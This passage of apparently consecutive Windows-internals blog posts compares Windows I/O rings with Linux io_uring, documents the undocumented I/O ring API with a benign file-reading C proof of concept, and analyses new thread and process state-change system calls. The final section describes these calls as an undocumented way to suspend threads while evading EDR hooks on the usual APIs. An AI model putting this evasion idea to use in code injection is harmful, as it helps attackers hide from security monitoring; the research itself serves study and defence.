This is another difference worth noticing – on Linux the completion ring (or queue) directly contains the array of CQEs, but the submission ring does not. Instead, the sqes field in the submission ring is a pointer to another memory region containing the array of SQEs, that has to be mapped separately. To index this array, the sqring has an additional array field which contains the index into the SQEs array. Not being a Linux expert, I won’t try to explain the reasoning behind this design and will simply quote the reasoning given in the paper mentioned above:

This might initially seem odd and confusing, but there’s some reasoning behind it. Some applications may embed request units inside internal data structures, and this allows them the flexibility to do so while retaining the ability to submit multiple sqes in one operation. That in turns allows for easier conversion of said applications to the io_uring interface.

On Windows there are only two important regions since the SQEs are part of the submission ring. In fact both rings are allocated by the system in the same memory region so there is only one shared view between the user and kernel space, containing two separate rings.
One more difference exists when creating a new I/O ring: on Linux the number of entries in a submission ring can be between 1 and 0x1000 (4096) while on Windows it can be between 1 and 0x10000, but at least 8 entries will always be allocated. In both cases the completion queue will have twice the number of entries as the submission queue. There is one small difference regarding the exact number of entries requested for the ring: For technical reasons the number of entries in both rings has to be a power of two. On Windows, the system takes the requested ring size and aligns it to the nearest power of two to receive the actual size that will be used to allocate the ring memory. On Linux the system does not do that, and the application is expected to request a size that is a power of two.

Versioning

Windows puts far more focus on compatibility than Linux does, putting a lot of effort into making sure that when a new feature ships, applications using it will be able to work properly across different Windows builds even as the feature changes. For that reason, Windows implements versioning for its structures and features and Linux does not. Windows also implements I/O rings in phases, marked by those versions, where the first versions only implemented read operations, the next version will implement write and flush operations, and so on. When creating an I/O ring the caller needs to pass in a version to indicate which version of I/O rings it wants to use.
On Linux, however, the feature was implemented fully from the beginning and does not require versioning. Also, Linux doesn’t put as much focus on compatibility and users of io_uring are expected to use and support the latest features.

Waiting for Operation Completion

On both Windows and Linux the caller can choose to not wait on the completion of events in the I/O ring and simply get notified when all operations are complete, making this feature fully asynchronous. In both systems the caller can also choose to wait on all events in a fully synchronous way, specifying a timeout in case processing the events takes too long. Everything in between is the area where the systems differ.
On Linux, a caller can request a wait on the completion of a specific number of operations in the ring, a capability Windows doesn’t allow. This capability allows applications to start processing the results after a certain amount of operations were completed, instead of waiting for all of them. In newer builds Windows did add a similar yet slightly more limited option – registering a notification event that will be set when the first entry in the ring gets completed to signal to the waiting application that it’s safe to start processing the results now.

Helper Libraries

In both systems it is possible for an application to manage its rings itself through system calls. This is an option that’s accepted on Linux and highly discouraged on Windows, where the NT API is undocumented and officially should not be used by non-Microsoft code. However, in both systems most applications have no need to manage the rings themselves and a lot of a generic ring management code can be abstracted and managed by a separate component. This is done through helper libraries – KernelBase.dll on Windows and liburing on Linux.
Both libraries export generic functionality like creating, initializing and deleting an I/O ring, creating submission queue entries, submitting a ring and getting a result from the completion queue.
Both libraries use very similar functions and data structures, making the task of porting code from one platform to the other much easier.

Conclusion

The implementation of I/O rings on Windows is so similar to the Linux io_uring that it looks like some headers were almost copied from the io_uring implementation. There are some differences between the two features, mostly due to philosophical differences between the two systems and the role and responsibilities they give the user. The Linux io_uring was added a couple of years ago, making it a more mature feature than the new Windows implementation, though still a relatively young one and not without issues. It will be interesting to see where these two features will go in the future and what parity will exist in them in a few years.

I/O Rings – When One I/O Operation is Not Enough

Introduction

I usually write about security features or techniques on Windows. But today’s blog is not directly related to any security topics, other than the usual added risk that any new system call introduces. However, it’s an interesting addition to the I/O world in Windows that could be useful for developers and I thought it would be interesting to look into and write about. All this is to say – if you’re looking for a new exploit or EDR bypass technique, you should save yourselves the time and look at the other posts on this website instead.

For the three of you who are still reading, let’s talk about I/O rings!

I/O ring is a new feature on Windows preview builds. This is the Windows implementation of a ring buffer – a circular buffer, in this case used to queue multiple I/O operations simultaneously, to allow user-mode applications performing a lot of I/O operations to do so in one action instead of transitioning from user to kernel and back for every individual request.

This new feature adds a lot of new functions and internal data structures, so to avoid constantly breaking the flow of the blog with new data structures I will not put them as part of the post, but their definitions exist in the code sample at the end. I will only show a few internal data structures that aren’t used in the code sample.

I/O Ring Usage

The current implementation of I/O rings only supports read operations and allows queuing up to 0x10000 operations at a time. For every operation the caller will need to supply a handle to the target file, an output buffer, an offset into the file and amount of memory to be read. This is all done in multiple new data structures that will be discussed later. But first, the caller needs to initialize its I/O ring.

Create and Initialize an I/O Ring

To do that, the system supplies a new system call – NtCreateIoRing. This function creates an instance of a new IoRing object type, described here as IORING_OBJECT:

typedef struct _IORING_OBJECT
{
  USHORT Type;
  USHORT Size;
  NT_IORING_INFO Info;
  PSECTION SectionObject;
  PVOID KernelMappedBase;
  PMDL Mdl;
  PVOID MdlMappedBase;
  ULONG_PTR ViewSize;
  ULONG SubmitInProgress;
  PVOID IoRingEntryLock;
  PVOID EntriesCompleted;
  PVOID EntriesSubmitted;
  KEVENT RingEvent;
  PVOID EntriesPending;
  ULONG BuffersRegistered;
  PIORING_BUFFER_INFO BufferArray;
  ULONG FilesRegistered;
  PHANDLE FileHandleArray;
} IORING_OBJECT, *PIORING_OBJECT;

NtCreateIoRing receives one new structure as an input argument – IO_RING_STRUCTV1. This structure contains information about current version, which currently can only be 1, required and advisory flags (both don’t currently support any values other than 0) and the requested size for the submission queue and completion queue.

The function receives this information and does the following things:

  1. Validates all the input and output arguments – their addresses, size alignment, etc.
  2. Checks the requested submission queue size and calculate the amount of memory needed for the submission queue based on the requested number of entries.
    1. If SubmissionQueueSize is over 0x10000 a new error status STATUS_IORING_SUBMISSION_QUEUE_TOO_BIG gets returned.
  3. Checks the completions queue size and calculates the amount of memory needed for it.
    1. The completion queue is limited to 0x20000 entries and error code STATUS_IORING_COMPLETION_QUEUE_TOO_BIG is returned if a larger number is requested.
  4. Creates a new object of type IoRingObjectType and initializes all fields that can be initialized at this point – flags, submission queue size and mask, event, etc.
  5. Creates a section for the queues, maps it in system space and creates an MDL to back it. Then maps the same section in user-space. This section will contain the submission space and completion space and will be used by the application to communicate the parameters for all requested I/O operations with the kernel and receive the status codes.
  6. Initializes the output structure with the submission queue address and other data to be returned to the caller.

After NtCreateIoRing returns successfully, the caller can write its data into the supplied submission queue. The queue will have a queue head, followed by an array of NT_IORING_SQE structures, each representing one requested I/O operation. The header describes which entries should be processed at this time:

The queue header describes which entries should be processed using the Head and Tail fields. Head specifies the index of the last unprocessed entry, and Tail specifies the index to stop processing at. Tail - Head has to be lower that total number of entries, as well as equal to or highrt than the number of entries that will be requested in the call to NtSubmitIoRing.

Each queue entry contains data about the requested operation: file handle, file offset, output buffer base, offset and amount of data to be read.  It also contains an OpCode field to specify the requested operation.

I/O Ring Operation Codes

There are four possible operation types that can be requested by the caller:

  1. IORING_OP_READ: requests that the system reads data from a file into an output buffer. The file handle will be read from the FileRef field in the submission queue entry. This will either be interpreted as a file handle or as an index into a pre-registered array of file handles, depending on whether the IORING_SQE_PREREGISTERED_FILE flag (1) is set in the queue entry Flags field. The output will be written into an output buffer supplied in the Buffer field of the entry. Similar to FileRef, this field can instead contain an index into a pre-registered array of output buffers if the IORING_SQE_PREREGISTERED_BUFFER flag (2) is set.
  2. IORING_OP_REGISTERED_FILES: requests pre-registration of file handles to be processed later. In this case the Buffer field of the queue entry points to an array of file handles. The requested file handles will get duplicated and placed in a new array, in the FileHandleArray field of the queue entry. The FilesRegistered field will contain the number of file handles.
  3. IORING_OP_REGISTERED_BUFFERS: requests pre-registration of output buffers for file data to be read into. In this case, the Buffer field in the entry should contain an array of IORING_BUFFER_INFO structures, describing addresses and sizes of buffers into which file data will be read:

    typedef struct _IORING_BUFFER_INFO
    {
        PVOID Address;
        ULONG Length;
    } IORING_BUFFER_INFO, *PIORING_BUFFER_INFO;

    The buffers’ addresses and sizes will be copied into a new array and placed in the BufferArray field of the submission queue. The BuffersRegistered field will contain the number of buffers.

  4. IORING_OP_CANCEL: requests the cancellation of a pending operation for a file. Just like the in IORING_OP_READ, the FileRef can be a handle or an index into the file handle array depending on the flags. In this case the Buffer field points to the IO_STATUS_BLOCK to be canceled for the file.

All these options can be a bit confusing so here are illustrations for the 4 different reading scenarios, based on the requested flags:

Flags are 0, using the FileRef field as a file handle and the Buffer field as a pointer to the output buffer:

Flag IORING_SQE_PREREGISTERED_FILE (1) is requested, so FileRef is treated as an index into an array of pre-registered file handles and Buffer is a pointer to the output buffer:

Flag IORING_SQE_PREREGISTERED_BUFFER (2) is requested, so FileRef is a handle to a file and Buffer is treated as an index into an array of pre-registered output buffers:

Both IORING_SQE_PREREGISTERED_FILE and IORING_SQE_PREREGISTERED_BUFFER flags are set, so FileRef is treated as an index into a pre-registered file handle array and Buffer is treated as index into a pre-registered buffers array:

Submitting and Processing I/O Ring

Once the caller set up all its submission queue entries, it can call NtSubmitIoRing to submit its requests to the kernel to get processed according to the requested parameters. Internally, NtSubmitIoRing iterates over all the entries and calls IopProcessIoRingEntry, sending the IoRing object and the current queue entry. The entry gets processed according to the specified OpCode and then calls IopIoRingDispatchComplete to fill in the completion queue. The completion queue, much like the submission queue, begins with a header, containing a Head and a Tail, followed by an array of entries. Each entry is an IORING_CQE structure – it has the UserData value from the submission queue entry and the Status and Information from the IO_STATUS_BLOCK for the operation:

typedef struct _IORING_CQE
{
    UINT_PTR UserData;
    HRESULT ResultCode;
    ULONG_PTR Information;
} IORING_CQE, *PIORING_CQE;

Once all requested entries are completed the system sets the event in IoRingObject->RingEvent. As long as not all entries are complete the system will wait on the event using the Timeout received from the caller and wake up when all requests are completed, causing the event to be signaled, or when the timeout expires.

Since multiple entries can be processed, the status returned to the caller will either be an error status indicating a failure to process the entries or the return value of KeWaitForSingleObject. Status codes for individual operations can be found in the completion queue – so don’t confuse receiving a STATUS_SUCCESS code from NtSubmitIoRing with successful read operations!

Using I/O Ring – The Official Way

Like other system calls, those new IoRing functions are not documented and not meant to be used directly. Instead, KernelBase.dll offers convenient wrapper functions that receive easy-to-use arguments and internally handle all the undocumented functions and data structures that need to be sent to the kernel. There are functions to create, query, submit and close the IoRing, as well as helper functions to build queue entries for the four different operations, which were discussed earlier.

CreateIoRing

CreateIoRing receives information about flags and queue sizes, and internally calls NtCreateIoRing and returns a handle to an IoRing instance:

HRESULT
CreateIoRing (
    _In_ IORING_VERSION IoRingVersion,
    _In_ IORING_CREATE_FLAGS Flags,
    _In_ UINT32 SubmissionQueueSize,
    _In_ UINT32 CompletionQueueSize,
    _Out_ HIORING* Handle
);

This new handle type is actually a pointer to an undocumented structure containing the structure returned from NtCreateIoRing and other data needed to manage this IoRing instance:

typedef struct _HIORING
{
    ULONG SqePending;
    ULONG SqeCount;
    HANDLE handle;
    IORING_INFO Info;
    ULONG IoRingKernelAcceptedVersion;
} HIORING, *PHIORING;

All the other IoRing functions will receive this handle as their first argument.

After creating an IoRing instance, the application needs to build queue entries for all the requested I/O operations. Since the internal structure of the queues and the queue entry structures are not documented, KernelBase.dll exports helper functions to build those using input data supplied by the caller. There are four functions for this purpose:

  1. BuildIoRingReadFile
  2. BuildIoRingRegisterBuffers
  3. BuildIoRingRegisterFileHandles
  4. BuildIoRingCancelRequest

Each function create adds a new queue entry to the submission queue with the required opcode and data. Their names make their purposes pretty obvious but lets go over them one by one just for clarity:

BuildIoRingReadFile

HRESULT
BuildIoRingReadFile (
    _In_ HIORING IoRing,
    _In_ IORING_HANDLE_REF FileRef,
    _In_ IORING_BUFFER_REF DataRef,
    _In_ ULONG NumberOfBytesToRead,
    _In_ ULONG64 FileOffset,
    _In_ ULONG_PTR UserData,
    _In_ IORING_SQE_FLAGS Flags
);

The function receives the handle returned by CreateIoRing followed by two pointers to new data structures. Both of these structures have a Kind field, which can be either IORING_REF_RAW, indicating that the supplied value is a raw reference, or IORING_REF_REGISTERED, indicating that the value is an index into a pre-registered array. The second field is a union of a value and an index, in which the file handle or buffer will be supplied.

BuildIoRingRegisterFileHandles and BuildIoRingRegisterBuffers

HRESULT
BuildIoRingRegisterFileHandles (
    _In_ HIORING IoRing,
    _In_ ULONG Count,
    _In_ HANDLE const Handles[],
    _In_ PVOID UserData
);

HRESULT
BuildIoRingRegisterBuffers (
    _In_ HIORING IoRing,
    _In_ ULONG Count,
    _In_ IORING_BUFFER_INFO count Buffers[],
    _In_ PVOID UserData
);

These two functions create submission queue entries to pre-register file handles and output buffers. Both receive the handle returned from CreateIoRing, the count of pre-registered files/buffers in the array, an array of the handles or buffers to register and UserData.

In BuildIoRingRegisterFileHandles, Handles is a pointer to an array of file handles and in BuildIoRingRegisterBuffers, Buffers is a pointer to an array of IORING_BUFFER_INFO structures containing Buffer base and size.

BuildIoRingCancelRequest

HRESULT
BuildIoRingCancelRequest (
    _In_ HIORING IoRing,
    _In_ IORING_HANDLE_REF File,
    _In_ PVOID OpToCancel,
    _In_ PVOID UserData
);

Just like the other functions, BuildIoRingCancelRequest receives as its first argument the handle that was returned from CreateIoRing. The second argument is again a pointer to an IORING_REQUEST_DATA structure that contains the handle (or index in the file handles array) to the file whose operation should be canceled. The third and fourth arguments are the output buffer and UserData to be placed in the queue entry.

After all queue entries were built with those functions, the queue can be submitted:

SubmitIoRing

HRESULT
SubmitIoRing (
    _In_ HIORING IoRingHandle,
    _In_ ULONG WaitOperations,
    _In_ ULONG Milliseconds,
    _Out_ PULONG SubmittedEntries
);

The function receives the same handle as the first argument that was used to initialize the IoRing and submission queue. Then it receives the amount of entries to submit, time in milliseconds to wait on the completion of the operations, and a pointer to an output parameter that will receive the number of entries that were submitted.

GetIoRingInfo

HRESULT
GetIoRingInfo (
    _In_ HIORING IoRingHandle,
    _Out_ PIORING_INFO IoRingBasicInfo
);

This API returns information about the current state of the IoRing with a new structure:

typedef struct _IORING_INFO
{
  IORING_VERSION IoRingVersion;
  IORING_CREATE_FLAGS Flags;
  ULONG SubmissionQueueSize;
  ULONG CompletionQueueSize;
} IORING_INFO, *PIORING_INFO;

This contains the version and flags of the IoRing as well as the current size of the submission and completion queues.

Once all operations on the IoRing are done, it needs be closed using CloseIoRing which receives the handle as its only argument and closes the handle to the IoRing object and frees the memory used for the structure.

So far I couldn’t find anything on the system that makes use of this feature, but once 21H2 is released I’d expect to start seeing I/O-heavy Windows applications start using it, probably mostly in server and azure environments.

Conclusion

So far, no public documentation exists for this new addition to the I/O world in Windows, but hopefully when 21H2 is released later this year we will see all of this officially documented and used by both Windows and 3rd party applications. If used wisely, this could lead to significant performance improvements for applications that have frequent read operations. Like every new feature and system call this could also have unexpected security effects. One bug was already found by hFiref0x, who was the first to publicly mention this feature and managed to crash the system by sending an incorrect parameter to NtCreateIoRing – a bug that was fixed since then. Looking more closely into these functions will likely lead to more such discoveries and interesting side effects of this new mechanism.

Code

Here’s a small PoC showing two ways to use I/O rings – either through the official KernelBase API, or through the internal ntdll API. For the code to compile properly make sure to link it against onecoreuap.lib (for the KernelBase functions) or ntdll.lib (for the ntdll functions):

#include <ntstatus.h>
#define WIN32_NO_STATUS
#include <Windows.h>
#include <cstdio>
#include <ioringapi.h>
#include <winternal.h>

typedef struct _IO_RING_STRUCTV1
{
    ULONG IoRingVersion;
    ULONG SubmissionQueueSize;
    ULONG CompletionQueueSize;
    ULONG RequiredFlags;
    ULONG AdvisoryFlags;
} IO_RING_STRUCTV1, *PIO_RING_STRUCTV1;

typedef struct _IORING_QUEUE_HEAD
{
    ULONG Head;
    ULONG Tail;
    ULONG64 Flags;
} IORING_QUEUE_HEAD, *PIORING_QUEUE_HEAD;

typedef struct _NT_IORING_INFO
{
    ULONG Version;
    IORING_CREATE_FLAGS Flags;
    ULONG SubmissionQueueSize;
    ULONG SubQueueSizeMask;
    ULONG CompletionQueueSize;
    ULONG CompQueueSizeMask;
    PIORING_QUEUE_HEAD SubQueueBase;
    PVOID CompQueueBase;
} NT_IORING_INFO, *PNT_IORING_INFO;

typedef struct _NT_IORING_SQE
{
    ULONG Opcode;
    ULONG Flags;
    HANDLE FileRef;
    LARGE_INTEGER FileOffset;
    PVOID Buffer;
    ULONG BufferSize;
    ULONG BufferOffset;
    ULONG Key;
    PVOID Unknown;
    PVOID UserData;
    PVOID stuff1;
    PVOID stuff2;
    PVOID stuff3;
    PVOID stuff4;
} NT_IORING_SQE, *PNT_IORING_SQE;

EXTERN_C_START
NTSTATUS
NtSubmitIoRing (
    _In_ HANDLE Handle,
    _In_ IORING_CREATE_REQUIRED_FLAGS Flags,
    _In_ ULONG EntryCount,
    _In_ PLARGE_INTEGER Timeout
    );

NTSTATUS
NtCreateIoRing (
    _Out_ PHANDLE pIoRingHandle,
    _In_ ULONG CreateParametersSize,
    _In_ PIO_RING_STRUCTV1 CreateParameters,
    _In_ ULONG OutputParametersSize,
    _Out_ PNT_IORING_INFO pRingInfo
    );

NTSTATUS
NtClose (
    _In_ HANDLE Handle
    );

EXTERN_C_END

void IoRingNt ()
{
    NTSTATUS status;
    IO_RING_STRUCTV1 ioringStruct;
    NT_IORING_INFO ioringInfo;
    HANDLE handle;
    PNT_IORING_SQE sqe;
    LARGE_INTEGER timeout;
    HANDLE hFile = NULL;
    ULONG sizeToRead = 0x200;
    PVOID *buffer = NULL;
    ULONG64 endOfBuffer;

    ioringStruct.IoRingVersion = 1;
    ioringStruct.SubmissionQueueSize = 1;
    ioringStruct.CompletionQueueSize = 1;
    ioringStruct.AdvisoryFlags = IORING_CREATE_ADVISORY_FLAGS_NONE;
    ioringStruct.RequiredFlags = IORING_CREATE_REQUIRED_FLAGS_NONE;

    status = NtCreateIoRing(&handle,
                            sizeof(ioringStruct),
                            &ioringStruct,
                            sizeof(ioringInfo),
                            &ioringInfo);
    if (!NT_SUCCESS(status))
    {
        printf("Failed creating IO ring handle: 0x%x\n", status);
        goto Exit;
    }

    ioringInfo.SubQueueBase->Tail = 1;
    ioringInfo.SubQueueBase->Head = 0;
    ioringInfo.SubQueueBase->Flags = 0;

    hFile = CreateFile(L"C:\\Windows\\System32\\notepad.exe",
                       GENERIC_READ,
                       0,
                       NULL,
                       OPEN_EXISTING,
                       FILE_ATTRIBUTE_NORMAL,
                       NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        printf("Failed opening file handle: 0x%x\n", GetLastError());
        goto Exit;
    }

    sqe = (PNT_IORING_SQE)((ULONG64)ioringInfo.SubQueueBase + sizeof(IORING_QUEUE_HEAD));
    sqe->Opcode = 1;
    sqe->Flags = 0;
    sqe->FileRef = hFile;
    sqe->FileOffset.QuadPart = 0;
    buffer = (PVOID*)VirtualAlloc(NULL, sizeToRead, MEM_COMMIT, PAGE_READWRITE);
    if (buffer == NULL)
    {
        printf("Failed allocating memory\n");
        goto Exit;
    }
    sqe->Buffer = buffer;
    sqe->BufferOffset = 0;
    sqe->BufferSize = sizeToRead;
    sqe->Key = 1234;
    sqe->UserData = nullptr;

    timeout.QuadPart = -10000;

    status = NtSubmitIoRing(handle, IORING_CREATE_REQUIRED_FLAGS_NONE, 1, &timeout);
    if (!NT_SUCCESS(status))
    {
        printf("Failed submitting IO ring: 0x%x\n", status);
        goto Exit;
    }
    printf("Data from file:\n");
    endOfBuffer = (ULONG64)buffer + sizeToRead;
    for (; (ULONG64)buffer < endOfBuffer; buffer++)
    {
        printf("%p ", *buffer);
    }
    printf("\n");

Exit:
    if (handle)
    {
        NtClose(handle);
    }
    if (hFile)
    {
        NtClose(hFile);
    }
    if (buffer)
    {
        VirtualFree(buffer, NULL, MEM_RELEASE);
    }
}

void IoRingKernelBase ()
{
    HRESULT result;
    HIORING handle;
    IORING_CREATE_FLAGS flags;
    IORING_HANDLE_REF requestDataFile;
    IORING_BUFFER_REF requestDataBuffer;
    UINT32 submittedEntries;
    HANDLE hFile = NULL;
    ULONG sizeToRead = 0x200;
    PVOID *buffer = NULL;
    ULONG64 endOfBuffer;

    flags.Required = IORING_CREATE_REQUIRED_FLAGS_NONE;
    flags.Advisory = IORING_CREATE_ADVISORY_FLAGS_NONE;
    result = CreateIoRing(IORING_VERSION_1, flags, 1, 1, &handle);
    if (!SUCCEEDED(result))
    {
        printf("Failed creating IO ring handle: 0x%x\n", result);
        goto Exit;
    }

    hFile = CreateFile(L"C:\\Windows\\System32\\notepad.exe",
                       GENERIC_READ,
                       0,
                       NULL,
                       OPEN_EXISTING,
                       FILE_ATTRIBUTE_NORMAL,
                       NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        printf("Failed opening file handle: 0x%x\n", GetLastError());
        goto Exit;
    }
    requestDataFile.Kind = IORING_REF_RAW;
    requestDataFile.Handle = hFile;
    requestDataBuffer.Kind = IORING_REF_RAW;
    buffer = (PVOID*)VirtualAlloc(NULL,
                                  sizeToRead,
                                  MEM_COMMIT,
                                  PAGE_READWRITE);
    if (buffer == NULL)
    {
        printf("Failed to allocate memory\n");
        goto Exit;
    }
    requestDataBuffer.Buffer = buffer;
    result = BuildIoRingReadFile(handle,
                                 requestDataFile,
                                 requestDataBuffer,
                                 sizeToRead,
                                 0,
                                 NULL,
                                 IOSQE_FLAGS_NONE);
    if (!SUCCEEDED(result))
    {
        printf("Failed building IO ring read file structure: 0x%x\n", result);
        goto Exit;
    }

    result = SubmitIoRing(handle, 1, 10000, &submittedEntries);
    if (!SUCCEEDED(result))
    {
        printf("Failed submitting IO ring: 0x%x\n", result);
        goto Exit;
    }
    printf("Data from file:\n");
    endOfBuffer = (ULONG64)buffer + sizeToRead;
    for (; (ULONG64)buffer < endOfBuffer; buffer++)
    {
        printf("%p ", *buffer);
    }
    printf("\n");

Exit:
    if (handle != 0)
    {
        CloseIoRing(handle);
    }
    if (hFile)
    {
        NtClose(hFile);
    }
    if (buffer)
    {
        VirtualFree(buffer, NULL, MEM_RELEASE);
    }
}

int main ()
{
    IoRingKernelBase();
    IoRingNt();
    ExitProcess(0);
}

Thread and Process State Change

a.k.a: EDR Hook Evasion – Method #4512

Every couple of weeks a new build of Windows Insider gets released. Some have lots of changes and introduce completely new features, some only have minor bug fixes, and some simply insist on crashing repeatedly for no good reason. A few months ago one of those builds had a few surprising changes — It introduced 2 new object types and 4 new system calls, not something that happens every day. So of course I went investigating. What I discovered is a confusingly over-engineered feature, which was added to solve a problem that could have been solved by much simpler means and which has the side effect of supplying attackers with a new way to evade EDR hooks.

Suspending and Resuming Threads – Now With 2 Extra Steps!

The problem that this feature is trying to solve is this: what happens if a process suspends a thread and then terminates before resuming it? Unless some other part of the system realizes what happened, the thread will remain suspended forever and will never resume its execution. To solve that, this new feature allows suspending and resuming threads and processes through the new object types, which will keep track of the suspension state of the threads or processes. That way, when the object is destroyed (for example, when the process that created it is terminated), the system will reset the state of the target process or thread by suspending or resuming it as needed.

This feature is pretty easy to use – the caller first needs to call NtCreateThreadStateChange (or NtCreateProcessStateChange. Both cases are almost identical but we’ll stay with the thread case for simplicity) to create a new object of type PspThreadStateChangeType. This object type is not documented, but its internal structure looks something like this:

struct _THREAD_STATE_OBJECT
{
    PETHREAD Thread;
    EX_PUSH_LOCK Lock;
    ULONG ThreadSuspendCount;
} THREAD_STATE_OBJECT, *PTHREAD_STATE_OBJECT;

NtCreateThreadStateChange has the following prototype:

NTSTATUS
NtCreateThreadStateChange (
    _Out_ PHANDLE StateChangeHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ HANDLE ThreadHandle,
    _In_ ULONG Unused
);

The 2 arguments we are interested in are the first one, which will receive a handle to the new object, and the fourth — a handle to the thread that will be referenced by the structure. Any future suspend or resume operation that will be done through this object can only work on the thread that’s being passed into this function. NtCreateProcessStateChange will create a new object instance, set the thread pointer to the requested thread, and initialize the lock and count fields to zero.

When calling NtCreateProcessStateChange to operate on a process, the thread handle will be replaced with a process handle and the object that will be created will be of type PspProcessStateChangeType. The only change in the structure is that the ETHREAD pointer is replaced with an EPROCESS pointer.

The next step is calling NtChangeThreadState (or NtChangeProcessState, if operating on a process). This function receives a handle to the thread state change object, a handle to the same thread that was passed when creating the object, and an action, which is an enum value:

typedef enum _THREAD_STATE_CHANGE_TYPE
{
    ThreadStateChangeSuspend = 0,
    ThreadStateChangeResume = 1,
    ThreadStateChangeMax = 2,
} THREAD_STATE_CHANGE_TYPE, *PTHREAD_STATE_CHANGE_TYPE;

typedef enum _PROCESS_STATE_CHANGE_TYPE
{
    ProcessStateChangeSuspend = 0,
    ProcessStateChangeResume = 1,
    ProcessStateChangeMax = 2,
} PROCESS_STATE_CHANGE_TYPE, *PPROCESS_STATE_CHANGE_TYPE;

It also receives an “Extended Information” variable and its length, both of which are unused and must be zero, and another reserved argument that must also be zero. The function will validate that the thread pointed to by the thread state change object is the same as the thread whose handle was passed into the function, and then call the appropriate function based on the requested action – PsSuspendThread or PsMultiResumeThread. Then it will increment or decrement the ThreadSuspendCount field based on the action that was performed. There are 2 limitations enforced by the suspend count:

  1. A thread cannot be resumed if the object’s ThreadSuspendCount is zero, even if the thread is currently suspended. It must be suspended and resumed using the state change API, otherwise things will start acting funny.
  2. A thread cannot be suspended if ThreadSuspendCount is 0x7FFFFFFF. This is meant to avoid overflowing the counter. However, this is a weird limitation since KeSuspendThread (the internal function called from PsSuspendThread) already enforces a suspension limit of 127 through the thread’s SuspendCount field, and will throw an error STATUS_SUSPEND_COUNT_EXCEEDED if the count exceeds that.

So far this works like the classic suspend and resume mechanism, just with a few extra steps. A caller still needs to make an API call to suspend a thread or process and another one to resume it.  But the benefit of having new object types is that objects can have kernel routines that get called for certain operations related to the object, such as open, close and delete:

dx (*(nt!_OBJECT_TYPE**)&nt!PspThreadStateChangeType)->TypeInfo
    (*(nt!_OBJECT_TYPE**)&nt!PspThreadStateChangeType)->TypeInfo                 [Type: _OBJECT_TYPE_INITIALIZER]
    [+0x000] Length           : 0x78 [Type: unsigned short]
    [+0x002] ObjectTypeFlags  : 0x6 [Type: unsigned short]
    [+0x002 ( 0: 0)] CaseInsensitive  : 0x0 [Type: unsigned char]
    [+0x002 ( 1: 1)] UnnamedObjectsOnly : 0x1 [Type: unsigned char]
    [+0x002 ( 2: 2)] UseDefaultObject : 0x1 [Type: unsigned char]
    [+0x002 ( 3: 3)] SecurityRequired : 0x0 [Type: unsigned char]
    [+0x002 ( 4: 4)] MaintainHandleCount : 0x0 [Type: unsigned char]
    [+0x002 ( 5: 5)] MaintainTypeList : 0x0 [Type: unsigned char]
    [+0x002 ( 6: 6)] SupportsObjectCallbacks : 0x0 [Type: unsigned char]
    [+0x002 ( 7: 7)] CacheAligned     : 0x0 [Type: unsigned char]
    [+0x003 ( 0: 0)] UseExtendedParameters : 0x0 [Type: unsigned char]
    [+0x003 ( 7: 1)] Reserved         : 0x0 [Type: unsigned char]
    [+0x004] ObjectTypeCode   : 0x0 [Type: unsigned long]
    [+0x008] InvalidAttributes : 0x92 [Type: unsigned long]
    [+0x00c] GenericMapping   [Type: _GENERIC_MAPPING]
    [+0x01c] ValidAccessMask  : 0x1f0001 [Type: unsigned long]
    [+0x020] RetainAccess     : 0x0 [Type: unsigned long]
    [+0x024] PoolType         : PagedPool (1) [Type: _POOL_TYPE]
    [+0x028] DefaultPagedPoolCharge : 0x70 [Type: unsigned long]
    [+0x02c] DefaultNonPagedPoolCharge : 0x0 [Type: unsigned long]
    [+0x030] DumpProcedure    : 0x0 [Type: void (__cdecl*)(void *,_OBJECT_DUMP_CONTROL *)]
    [+0x038] OpenProcedure    : 0x0 [Type: long (__cdecl*)(_OB_OPEN_REASON,char,_EPROCESS *,void *,unsigned long *,unsigned long)]
    [+0x040] CloseProcedure   : 0x0 [Type: void (__cdecl*)(_EPROCESS *,void *,unsigned __int64,unsigned __int64)]
    [+0x048] DeleteProcedure  : 0xfffff80265650d20 [Type: void (__cdecl*)(void *)]
    [+0x050] ParseProcedure   : 0x0 [Type: long (__cdecl*)(void *,void *,_ACCESS_STATE *,char,unsigned long,_UNICODE_STRING *,_UNICODE_STRING *,void *,_SECURITY_QUALITY_OF_SERVICE *,void * *)]
    [+0x050] ParseProcedureEx : 0x0 [Type: long (__cdecl*)(void *,void *,_ACCESS_STATE *,char,unsigned long,_UNICODE_STRING *,_UNICODE_STRING *,void *,_SECURITY_QUALITY_OF_SERVICE *,_OB_EXTENDED_PARSE_PARAMETERS *,void * *)]
    [+0x058] SecurityProcedure : 0xfffff802656bffd0 [Type: long (__cdecl*)(void *,_SECURITY_OPERATION_CODE,unsigned long *,void *,unsigned long *,void * *,_POOL_TYPE,_GENERIC_MAPPING *,char)]
    [+0x060] QueryNameProcedure : 0x0 [Type: long (__cdecl*)(void *,unsigned char,_OBJECT_NAME_INFORMATION *,unsigned long,unsigned long *,char)]
    [+0x068] OkayToCloseProcedure : 0x0 [Type: unsigned char (__cdecl*)(_EPROCESS *,void *,void *,char)]
    [+0x070] WaitObjectFlagMask : 0x0 [Type: unsigned long]
    [+0x074] WaitObjectFlagOffset : 0x0 [Type: unsigned short]
    [+0x076] WaitObjectPointerOffset : 0x0 [Type: unsigned short]

PspThreadStateChangeType has 2 registered procedures – the security procedure, which is SeDefaultObjectMethod and not too interesting to look at in this case as it is the default function, and the delete procedure, which is PspDeleteThreadStateChange. This function will get called every time a thread state change object is destroyed, and does a pretty simple thing:

If the target thread has a non-zero ThreadSuspendCount, the function will resume it as many times as it was suspended. As you can imagine, the process state change object also registers a delete procedure, PspDeleteProcessStateChange, which does something very similar.

New System Calls == New EDR Bypass

This is a nice, if slightly over-complicated, solution to the problem, but it has the unexpected side-effect of creating new and undocumented APIs to suspend and resume processes and threads. Since suspend and resume are very useful operations for attackers wishing to inject code, the well-known NtSuspendThread/Process and NtResumeThread/Process APIs are some of the first system calls that are hooked by security solutions, hoping to detect those attacks.

Having new APIs that perform the same operations without going through the well-known and often-monitored system calls is a great chance for attackers to avoid detection by security solutions that don’t keep up with recent changes (though I’m sure all EDR solutions have already started monitoring these new functions and have been doing so since this build was released. Right…?).

